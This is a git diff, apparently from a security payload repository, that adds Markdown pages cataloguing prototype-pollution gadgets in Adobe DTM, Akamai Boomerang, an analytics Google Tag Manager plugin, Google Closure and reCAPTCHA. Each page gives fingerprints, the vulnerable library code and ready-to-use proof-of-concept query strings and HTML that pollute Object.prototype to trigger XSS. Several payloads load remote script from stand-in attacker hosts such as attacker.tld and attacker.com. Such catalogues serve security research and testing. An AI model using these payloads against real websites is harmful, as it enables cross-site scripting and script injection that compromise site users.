Update wordlists

Prototype_Pollution/gadgets/adobe-dtm.md

@@ -0,0 +1,55 @@
+## Adobe Dynamic Tag Management
+
+URL: https://docs.adobe.com/content/help/en/dtm/using/c-overview.html
+
+### JS Fingerprint
+```
+return (typeof _satellite !== 'undefined')
+```
+
+### Vulnerable code fragment
+```
+https://assets.adobedtm.com/[a-f0-9]+/[a-f0-9]+/launch-[a-f0-9]+.min.js
+https://assets.adobedtm.com/launch-EN[a-f0-9]+.min.js
+```
+
+```js
+r.prototype._handleScriptToken = function u(e) {
+    var t = this, n = this.parser.clear();
+    n && this.writeQueue.unshift(n),
+    e.src = e.attrs.src || e.attrs.SRC,
+...
+
+a.prototype._writeScriptToken = function f(e, n) {
+    var t = this._buildScript(e)
+    , a = this._shouldRelease(t)
+    , i = this.options.afterAsync;
+    e.src && (t.src = e.src,
+```
+
+### PoC
+
+#### PoC #1
+```
+?__proto__[src]=data:,alert(1)//
+```
+
+```html
+<script>
+  Object.prototype.src='data:,alert(1)//'
+</script>
+<script src="https://assets.adobedtm.com/launch-ENa21cfed3f06f4ddf9690de8077b39e81-development.min.js" async></script>
+```
+
+
+#### PoC #2
+```
+?__proto__[SRC]=<img/src/onerror%3dalert(1)>
+```
+
+```html
+<script>
+  Object.prototype.SRC='<img/src/onerror=alert(1)>'
+</script>
+<script src="https://assets.adobedtm.com/launch-ENa21cfed3f06f4ddf9690de8077b39e81-development.min.js" async></script>
+```

Prototype_Pollution/gadgets/akamai-boomerang.md

@@ -0,0 +1,119 @@
+## Akamai Boomerang
+
+URL: https://developer.akamai.com/tools/boomerang
+
+### JS Fingerprint
+```
+return (typeof BOOMR !== 'undefined')
+```
+
+### Vulnerable code fragment
+https://github.com/akamai/boomerang#32-adding-it-via-an-iframepreload
+```js
+window.BOOMR = window.BOOMR || {};
+...
+// NOTE: Set Boomerang URL here
+window.BOOMR.url = "";
+...
+function promote() {
+  ...
+  var script = document.createElement("script");
+  script.id = "boomr-scr-as";
+  script.src = window.BOOMR.url;
+  ...
+  where.parentNode.appendChild(script);
+```
+
+### PoC
+
+```
+?__proto__[BOOMR]=1&__proto__[url]=//attacker.tld/js.js
+```
+
+```html
+<script>
+  Object.prototype.BOOMR = 1;
+  Object.prototype.url='https://attacker.com/js.js'
+</script>
+
+<script>
+(function() {
+    if (window.BOOMR && (window.BOOMR.version || window.BOOMR.snippetExecuted)) {
+        return;
+    }
+
+    window.BOOMR = window.BOOMR || {};
+    window.BOOMR.snippetStart = new Date().getTime();
+    window.BOOMR.snippetExecuted = true;
+    window.BOOMR.snippetVersion = 12;
+
+    window.BOOMR.url = "https://foo.bar/";
+
+    var 
+        where = document.currentScript || document.getElementsByTagName("script")[0],
+        promoted = false,
+        LOADER_TIMEOUT = 3000;
+
+    function promote() {
+        if (promoted) {
+            return;
+        }
+
+        var script = document.createElement("script");
+        script.id = "boomr-scr-as";
+        script.src = window.BOOMR.url;
+        script.async = true;
+
+        where.parentNode.appendChild(script);
+
+        promoted = true;
+    }
+
+    function iframeLoader(wasFallback) {
+        /* ... */
+    }
+
+    var link = document.createElement("link");
+
+    if (link.relList &&
+        typeof link.relList.supports === "function" &&
+        link.relList.supports("preload") &&
+        ("as" in link)) {
+        window.BOOMR.snippetMethod = "p";
+
+        link.href = window.BOOMR.url;
+        link.rel  = "preload";
+        link.as   = "script";
+
+        link.addEventListener("load", promote);
+        link.addEventListener("error", function() {
+            iframeLoader(true);
+        });
+
+        setTimeout(function() {
+            if (!promoted) {
+                iframeLoader(true);
+            }
+        }, LOADER_TIMEOUT);
+
+        BOOMR_lstart = new Date().getTime();
+
+        where.parentNode.appendChild(link);
+    }
+    else {
+        iframeLoader(false);
+    }
+
+    function boomerangSaveLoadTime(e) {
+        window.BOOMR_onload = (e && e.timeStamp) || new Date().getTime();
+    }
+
+    if (window.addEventListener) {
+        window.addEventListener("load", boomerangSaveLoadTime, false);
+    }
+    else if (window.attachEvent) {
+        window.attachEvent("onload", boomerangSaveLoadTime);
+    }
+})();
+</script>
+```

Prototype_Pollution/gadgets/analytics-google-tag-manager.md

@@ -0,0 +1,66 @@
+## Google Tag Manager plugin for analytics
+
+### URL
+
+https://www.npmjs.com/package/@analytics/google-tag-manager <br />
+https://github.com/DavidWells/analytics/tree/87394ecd762454a54b515d243b07d9984de81059/packages/analytics-plugin-google-tag-manager
+
+### JS Fingerprint
+
+```js
+return (typeof _analytics !== 'undefined' && typeof analyticsGtagManager !== 'undefined')
+```
+
+### Vulnerable code fragment
+
+https://unpkg.com/@analytics/[email protected]/dist/@analytics/google-tag-manager.min.js <br />
+https://github.com/DavidWells/analytics/blob/87394ecd762454a54b515d243b07d9984de81059/packages/analytics-plugin-google-tag-manager/src/browser.js
+
+```js
+initialize: function(e) {
+    var t = e.config,
+        a = t.containerId,
+        n = t.dataLayerName,
+        i = t.customScriptSrc,
+        c = t.preview,
+        u = t.auth;
+    if (!a) throw new Error("No google tag manager containerId defined");
+    if (c && !u) throw new Error("When enabling preview mode, both preview and auth parameters must be defined");
+    var g = i || "https://www.googletagmanager.com/gtm.js";
+    o(a) || (function(e, t, r, a, n) {
+        e[a] = e[a] || [], e[a].push({
+            "gtm.start": (new Date).getTime(),
+            event: "gtm.js"
+        });
+        var o = t.getElementsByTagName(r)[0],
+            i = t.createElement(r),
+            d = "dataLayer" != a ? "&l=" + a : "",
+            s = c ? "&gtm_preview=" + c + "&gtm_auth=" + u + "&gtm_cookies_win=x" : "";
+        i.async = !0, i.src = "".concat(g, "?id=") + n + d + s, o.parentNode.insertBefore(i, o)
+    }(window, document, "script", n, a), r = n, t.dataLayer = window[n])
+}
+```
+
+### PoC
+
+```
+?__proto__[customScriptSrc]=//attacker.tld/xss.js
+```
+
+```html
+<script src="https://unpkg.com/analytics/dist/analytics.min.js"></script>
+<script src="https://unpkg.com/@analytics/google-tag-manager/dist/@analytics/google-tag-manager.min.js"></script>
+<script>
+    Object.prototype.customScriptSrc = '//attacker.tld/xss.js'
+</script>
+<script>
+    var Analytics = _analytics.init({
+        app: 'my-app-name',
+        plugins: [
+          analyticsGtagManager({
+            containerId: 'GTM-123xyz'
+          })
+        ]
+    })
+</script>
+```

Prototype_Pollution/gadgets/closure.md

@@ -0,0 +1,123 @@
+## Google Closure
+
+Closure Library is a powerful, low-level JavaScript library designed for building complex and scalable web applications. 
+It is used by many Google web applications, such as Google Search, Gmail, Google Docs, Google+, Google Maps, and others.
+
+### URL
+
+https://github.com/google/closure-library
+
+### JS Fingerprint
+```
+return (typeof goog !== 'undefined' && typeof goog.basePath !== 'undefined')
+```
+
+### Vulnerable code fragment
+https://github.com/google/closure-library/blob/5a0002f16c91d41f5de3dc7bdcafe9b74b1b4fa0/closure/goog/html/sanitizer/attributewhitelist.js#L22-L107
+```js
+goog.html.sanitizer.AttributeWhitelist = {
+  '* ARIA-CHECKED': true,
+  '* ARIA-COLCOUNT': true,
+  '* ARIA-COLINDEX': true,
+  '* ARIA-CONTROLS': true,
+  '* ARIA-DESCRIBEDBY': tru
+...
+}
+```
+https://github.com/google/closure-library/blob/88f3857a26ec5ead36b4b49cb6c3f011cc534971/closure/goog/base.js#L2210-L2214
+```js
+  goog.findBasePath_ = function() {
+    if (goog.global.CLOSURE_BASE_PATH != undefined &&
+        // Anti DOM-clobbering runtime check (b/37736576).
+        typeof goog.global.CLOSURE_BASE_PATH === 'string') {
+      goog.basePath = goog.global.CLOSURE_BASE_PATH;
+```
+https://github.com/google/closure-library/blob/96a4b269b9ad15c008a392e5b59fe66fcf66b526/closure/goog/html/safehtml.js#L1066-L1067
+```js
+SafeHtml.EMPTY = new SafeHtml(
+    (goog.global.trustedTypes && goog.global.trustedTypes.emptyHTML) || '',
+```
+
+
+### PoC
+
+#### AttributeWhitelist
+
+```
+?__proto__[*%20ONERROR]=1&__proto__[*%20SRC]=1
+```
+
+```html
+<script>
+  Object.prototype['* ONERROR'] = 1;
+  Object.prototype['* SRC'] = 1;
+</script>
+<script src=https://google.github.io/closure-library/source/closure/goog/base.js></script>
+<script>
+  goog.require('goog.html.sanitizer.HtmlSanitizer');
+  goog.require('goog.dom');
+</script>
+<body>
+<script>
+  const html = '<img src onerror=alert(1)>';
+  const sanitizer = new goog.html.sanitizer.HtmlSanitizer();
+  const sanitized = sanitizer.sanitize(html);
+  const node = goog.dom.safeHtmlToNode(sanitized);
+
+  document.body.append(node);
+</script>
+```
+
+#### CLOSURE_BASE_PATH
+
+```
+?__proto__[CLOSURE_BASE_PATH]=data:,alert(1)//
+```
+
+```html
+<script>
+  Object.prototype.CLOSURE_BASE_PATH = 'data:,alert(1)//';
+</script>
+<script src=https://google.github.io/closure-library/source/closure/goog/base.js></script>
+<script>
+  goog.require('goog.html.sanitizer.HtmlSanitizer');
+  goog.require('goog.dom');
+</script>
+```
+
+#### Google reCAPTCHA
+
+**The vulnerability can be exploited in browsers that do not support Trusted Types. For example, FireFox.**
+
+```
+?__proto__[trustedTypes]=x&__proto__[emptyHTML]=<img/src/onerror%3dalert(1)>
+```
+
+```html
+<script>
+    Object.prototype.trustedTypes = "x";
+    Object.prototype.emptyHTML = "<img/src/onerror=alert(1)>";
+</script>
+<script src="https://www.google.com/recaptcha/api.js"></script>
+<div class="g-recaptcha" data-sitekey="your-site-key"/>
+```
+
+#### Google Tag Manager + Custom HTML Tag
+
+**The vulnerability can be exploited in browsers that do not support Trusted Types. For example, FireFox.**
+
+```
+?__proto__[trustedTypes]=x&__proto__[emptyHTML]=<img/src/onerror%3dalert(1)>
+```
+
+```html
+<script>
+    Object.prototype.trustedTypes = "x";
+    Object.prototype.emptyHTML = "<img/src/onerror=alert(1)>";
+</script>
+<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
+new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
+j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
+'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
+})(window,document,'script','dataLayer','GTM-WSPXXTG');</script>
+```